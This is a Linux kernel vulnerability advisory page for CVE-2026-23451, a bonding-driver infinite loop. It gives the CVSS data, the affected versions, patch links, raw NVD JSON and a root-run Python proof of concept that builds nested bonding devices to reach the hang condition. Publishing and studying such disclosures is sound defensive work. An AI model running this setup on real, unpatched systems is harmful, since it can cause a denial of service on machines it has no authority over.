Security Vulnerability Report
CVE-2026-23451 CVSS 7.5 HIGH

CVE-2026-23451

Published: 2026-04-03 16:16:31
Last Modified: 2026-05-21 00:30:22
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

bonding: prevent potential infinite loop in bond_header_parse()

bond_header_parse() can loop if a stack of two bonding devices is set up, because skb->dev always points to the hierarchy top.

Add new "const struct net_device *dev" parameter to (struct header_ops)->parse() method to make sure the recursion is bounded, and that the final leaf parse method is called.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:6.12.78:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.18.19:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel (before fix commit 4172a7901cf43fe1cc63ef7a2ef33735ff7b7d13)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-23451
This script demonstrates the network configuration required to trigger
the infinite loop in Linux Kernel's bonding driver.
Vulnerability: Nested bonding devices cause bond_header_parse() to loop infinitely.
"""
import os
import subprocess
import sys


def run_cmd(cmd):
    """Run one shell command and stop the script on the first failure."""
    try:
        subprocess.run(cmd, check=True, shell=True)
        print(f"[+] Success: {cmd}")
    except subprocess.CalledProcessError:
        print(f"[-] Failed: {cmd}")
        sys.exit(1)


def setup_vulnerable_env():
    # 1. Load required modules
    run_cmd("modprobe bonding")
    run_cmd("modprobe dummy")

    # 2. Create underlying dummy devices
    run_cmd("ip link add dummy0 type dummy")
    run_cmd("ip link set dummy0 up")

    # 3. Create the first bond (Bond0)
    run_cmd("ip link add bond0 type bond mode 0")
    run_cmd("ip link set dummy0 master bond0")
    run_cmd("ip link set bond0 up")

    # 4. Create the second bond (Bond1) and enslave Bond0 (Nested Configuration)
    # This nesting creates the condition where skb->dev points to the top (Bond1) recursively.
    run_cmd("ip link add bond1 type bond mode 0")
    run_cmd("ip link set bond0 master bond1")
    run_cmd("ip link set bond1 up")

    print("\n[!] Vulnerable environment configured.")
    print("[!] Nested topology: Bond1 -> Bond0 -> dummy0")
    print("[!] Sending traffic through Bond1 may trigger the infinite loop in bond_header_parse().")


if __name__ == "__main__":
    # geteuid() is provided by the os module, not subprocess
    if os.geteuid() != 0:
        print("[-] This script must be run as root.")
        sys.exit(1)
    setup_vulnerable_env()
```

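References

https://git.kernel.org/stable/c/4172a7901cf43fe1cc63ef7a2ef33735ff7b7d13 (Patch)
https://git.kernel.org/stable/c/946bb6cacf0ccada7bc80f1cfa07c1ed79511c1c (Patch)
https://git.kernel.org/stable/c/9b49c854f14f5e2d493e562a1e28d2e57fe37371 (Patch)
https://git.kernel.org/stable/c/b7405dcf7385445e10821777143f18c3ce20fa04 (Patch)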

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23451", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:31.460", "lastModified": "2026-05-21T00:30:22.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: prevent potential infinite loop in bond_header_parse()\n\nbond_header_parse() can loop if a stack of two bonding devices is setup,\nbecause skb->dev always points to the hierarchy top.\n\nAdd new \"const struct net_device *dev\" parameter to\n(struct header_ops)->parse() method to make sure the recursion\nis bounded, and that the final leaf parse method is called."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.12.78:*:*:*:*:*:*:*", "matchCriteriaId": "493FF782-C903-4656-94E0-20B2D0EA024C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18.19:*:*:*:*:*:*:*", "matchCriteriaId": "6D24CF0E-E6F3-40B8-97C7-4913453B199F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19.9:*:*:*:*:*:*:*", "matchCriteriaId": "AB047D77-F8E9-431C-8103-B177734E5125"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": 
"F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4172a7901cf43fe1cc63ef7a2ef33735ff7b7d13", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/946bb6cacf0ccada7bc80f1cfa07c1ed79511c1c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9b49c854f14f5e2d493e562a1e28d2e57fe37371", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b7405dcf7385445e10821777143f18c3ce20fa04", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}